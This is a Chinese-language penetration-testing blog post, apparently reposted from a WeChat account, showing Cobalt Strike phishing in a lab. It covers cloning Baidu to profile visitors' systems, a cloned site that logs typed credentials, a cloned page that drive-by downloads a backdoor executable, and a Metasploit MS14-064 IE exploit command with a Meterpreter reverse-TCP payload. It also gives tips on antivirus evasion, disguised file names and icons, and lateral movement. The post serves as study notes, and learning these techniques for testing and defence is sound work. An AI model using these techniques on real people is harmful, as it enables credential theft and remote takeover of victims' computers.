渗透地基钓鱼篇-Cobalt Strike钓鱼

  • A+
所属分类:安全文章
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。


授权转载,文章来源:“大余xiyou” 博客


0x01 前言

网络钓鱼是社会工程学攻击方式之一,主要是通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段!


网络钓鱼攻击是个人和公司在保护其信息安全方面面临的最常见的安全挑战之一。无论是获取密码、信用卡还是其他敏感信息,黑客都在使用电子邮件、社交媒体、电话和任何可能的通信方式窃取有价值的数据。


网络钓鱼攻击的兴起对所有组织都构成了重大威胁。重要的是,如果他们要保护自己的信息,所有组织都应该知道如何发现一些最常见的网络钓鱼骗局。同样还要熟悉攻击者用来实施这些骗局的一些最常见的技术类型。


这篇主要演示如何克隆和利用漏洞等方式进行钓鱼,并控制对方!!


0x02 环境介绍

黑客(攻击者):

IP:192.168.1.9

系统:kali.2020.4


VPS服务器:

目前演示是用kali来架设做VPS公网服务器的!道理意义一样!


办公电脑:

系统:windwos7和windwos xp


目前kali上运行了Cobalt strike ,攻击者在自己的公网VPS服务器上制作了后门页面钓鱼,通过各种方式办公电脑收到对方邮件或者各种手段发送的钓鱼链接,最终黑客控制办公电脑的过程!!

0x03 钓鱼演示

下面会演示到所有CS自带模块中的钓鱼攻击演示!!

1、智能收集

打开System Profiler-分析器功能…,选择克隆www.baidu.com页面做钓鱼…




攻击对象访问:http://192.168.1.9/baidu



当通过各种形式…将192.168.1.9/baidu链接发送给对方,让对方点击后…跳转到了baidu页面…

可看到选择应用信息后,钓到了客户用的系统以及浏览器版本型号…这里别小看两个信息,思路是该模块可以修改,利用溢出代码等形式提权或者获得更多的信息收集…下面我会写一些演示!!


2、克隆模块和克隆网站进行键盘记录攻击
打开Web Drive-by–Clone Site克隆网站模块…

这里克隆网站可以是http和https的URL…克隆到192.168.2.153:801链接上!!勾选Log Keystrokes on cloned site后,记录键盘操作!

打开Web Log功能查看被攻击方登录页面的操作情况!

可看到访问192.168.2.153:801页面输入了用户名密码…

可看到记录了对方输入键盘的信息!!

3、克隆网站下载执行木马

打开Host File 克隆一个页面并提供一个后门文件…


file:选择CS生成的shell,或者MSF也行!确定URL下载的地址端口链接等情况!


生成http://192.168.2.153:801/upload.exe恶意链接…


然后回到方法2中!!在打开Clone Site联动克隆模块,将克隆baidu页面,Attack攻击选择恶意链接页面进行钓鱼!


意思就是对方访问http://192.168.2.153:801/dayu页面后会直接下载attack恶意链接后门文件,页面正常跳转到百度页面!


可看到google访问该页面下载了upload.exe生成的CS后门文件…这里google带有web安全下载防御功能,IE高版本也会有提示,这种思路是两个模块配合完成的,其中可以修改图标、文件名、弄个免杀、换个欺骗链接,很好钓鱼!


4、Metasploit溢出代码与Cobalt Strik配合钓鱼

本次演示的是思路,拿的是一个针对XP或者以下系统,利用MS14_064利用IE执行远控木马…记住是思路!!


这里很简单,MSF执行exploit即可获得恶意链接:http://192.168.2.153:6666/Sixcra

use exploit/windows/browser/ms14_064_ole_code_executionset srvhost 192.168.2.153set SRVPORT 6666set payload windows/meterpreter/reverse_tcpset lhost 192.168.2.153exploit


很简单,利用和方法3一样,打开克隆网站模块,放入Attack即可!!这里就不勾选键盘记录了,因为直接能控制对方了!


生成URL:http://192.168.2.153:80/baidu


可看到当对方访问做好的http://192.168.2.153:80/baidu钓鱼页面后,直接跳转到了百度…但是通过溢出漏洞在攻击端获得了对方的控制shell…


通过控制,继续横向渗透即可!!


0x05 总结

这里有四种方法,总结下思路,就是各种模块之间的配合进行简单的钓鱼,知道这些思路后,还可以和别的钓鱼工具配合,或者是别的方法融合!


这里提醒下,如果在克隆模块克隆的是HTTPS的页面,需要在攻击方加载SSL哦,不然没法记录或者执行!!


今天基础牢固就到这里,虽然基础,但是必须牢记于心。




只需关注公众号并回复“9527”即可获取一套HTB靶场学习文档和视频,1120”获取安全参考等安全杂志PDF电子版,1208”获取个人常用高效爆破字典0221”获取2020年酒仙桥文章打包还在等什么?赶紧关注学习吧!


推 荐 阅 读





欢 迎 私 下 骚 扰



本文始发于微信公众号(潇湘信安):渗透地基钓鱼篇-Cobalt Strike钓鱼

发表评论